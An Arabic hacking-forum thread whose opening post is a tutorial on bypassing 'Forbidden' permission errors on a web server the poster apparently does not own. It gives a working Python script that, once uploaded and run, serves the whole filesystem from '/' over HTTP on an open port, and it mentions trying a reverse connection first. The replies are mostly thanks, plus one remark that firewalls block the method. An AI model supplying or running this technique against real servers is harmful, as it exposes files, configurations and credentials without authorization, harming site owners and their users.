حالة الموضوع:
مغلق
  1. ABO-SAGER

    ABO-SAGER Developer

    الأنتساب:
    ‏14 ديسمبر 2011
    المشاركات:
    58
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    الإقامة:
    الجزائر
    السلام عليكم ~

    كيف الحال يا أحبتي في لله
    ~

    اليوم معي شرح ان شاء الله راح يعجبكم
    ~

    اليوم بإذن لله راح نتخطى الفوربدين العنيد مهما كانت قوته ~

    شرط
    ~

    ان يكون السيرفر قابل انك تفتح فيه بورت
    ~

    اذا تبغا تعرف السيرفر يسمح انك تفتح بورت ولا لا جرب تسوي اتصال عكسي اذا نجح معك إن شاء 90% راح تتخطى ~

    طيب نبدأ على بركة لله
    ~

    الخطوة الأولى
    ~

    نرفع السكربت التالي بمتداد
    py ~

    كود PHP:
    #!/usr/bin/env python
    # devilzc0de.org (c) 2012
    import SimpleHTTPServer
    import SocketServer
    import os

    port 
    13123

    if __name__=='__main__':
        
    os.chdir('/')
        
    Handler SimpleHTTPServer.SimpleHTTPRequestHandler

        httpd 
    SocketServer.TCPServer((""port), Handler)

        print(
    "Now open this server on webbrowser at port : " str(port))
        print(
    "example: http://maho.com:" str(port))
        
    httpd.serve_forever()
    هنا تضع البورت المراد فتحة في السيرفر ~

    كود PHP:
    port 13123
    الأن احفظ السكربت ورفعة على السيرفر ~

    بمتداد py ولا تنسا تصرحه 0755 ~

    قم بتشغيل السكربت عن طريق الأمر ~


    كود PHP:
    python aa.py
    الأن الصفحة راح تتطول في التحميل ~

    اوك في هذي الحظة افتح صفحة جديدة في المتصفح وافتح رابط الموقع هكذا
    ~


    كود PHP:
    http://www.xxx.com:13123

    غير 13123 إلى البورت تبعك
    ~

    والنتيجة ~


    [​IMG]


    الأن تستطيع تصفح جميع ملفات السيرفر ~

    وهذا الكونفيق
    ~


    [​IMG]

    تم الشرح بوسطة ~

    ABO-SAGER ~

    ودمتم سالمين ^_^ ~

     
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. ÐŖ¸ĂβØô0Ďỵ

    ÐŖ¸ĂβØô0Ďỵ Developer

    الأنتساب:
    ‏9 مايو 2012
    المشاركات:
    57
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    دفـآع عن آلوطـن ..
    الإقامة:
    سـوري ودم غزآوي ..
    رد: تخطي الفوربدين عن طريق فتح بورت

    بارك الله فيك يا غالي على الطرح المميز
     
  4. سـلآشـ هـكــر

    سـلآشـ هـكــر DeveloPer Plus

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    104
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    الوظيفة:
    مآهو شغلك .}.!
    الإقامة:
    بـآإًرٍيـ...ـسَ ๏»ќŞά
    رد: تخطي الفوربدين عن طريق فتح بورت

    بارك الله فيك ياغالي
    )4:")4:"
     
  5. ђคкคг אאא

    ђคкคг אאא Developer

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    79
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    الإقامة:
    السعوديه
    رد: تخطي الفوربدين عن طريق فتح بورت

    السلام عليكم ورحمة الله وبركاته
    طريقة رائعة للقيام بالاتصال العكسي ولكنها لاتجدي نفعا في السيرفرات القوية فا اغلب السيرفرات تقوم بتفعيل الفيرول ووضع رولز تمنع فتح اي بورت الفوربدين مشكلة صلاحيات فاذا كانت صلاحيتك اقل من يوزر بالسيرفر فالمشكلة تكون صعبه جدا )2:"​
     
  6. Масћіле

    Масћіле Developer

    الأنتساب:
    ‏2 يونيو 2012
    المشاركات:
    26
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: تخطي الفوربدين عن طريق فتح بورت



    #.

    وٌعٌلَيِکمً الَسِسِسِلَامً وٌرحًمًة الَلَهّ وٌبًرکاتٌهّ

    يِعٌطِيِيِک الَعٌافُيِة ،، تٌقُبًلَ مًروٌريِ
     
  7. сомαиdα

    сомαиdα Developer

    الأنتساب:
    ‏29 مارس 2012
    المشاركات:
    51
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    in the holy Land
    رد: تخطي الفوربدين عن طريق فتح بورت

    الله يعطيك العافية والف شكر لك!:" ​
     
  8. Danger-Grave

    Danger-Grave Developer

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    10
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    ♥الـمـغـربــــ ♥
    رد: تخطي الفوربدين عن طريق فتح بورت

    تسلم اخي:{1}:
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة